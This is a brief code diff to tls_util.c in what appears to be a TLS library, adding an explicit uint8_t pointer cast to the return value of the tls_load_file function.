--- tls_util.c  9 Sep 2015 19:49:07 -   1.3
+++ tls_util.c  1 Oct 2016 11:30:28 -
@@ -154,7 +154,7 @@ tls_load_file(const char *name, size_t *
 
  done:
*len = size;
-   return (buf);
+   return ((uint8_t *)buf);
 
  fail:
free(buf);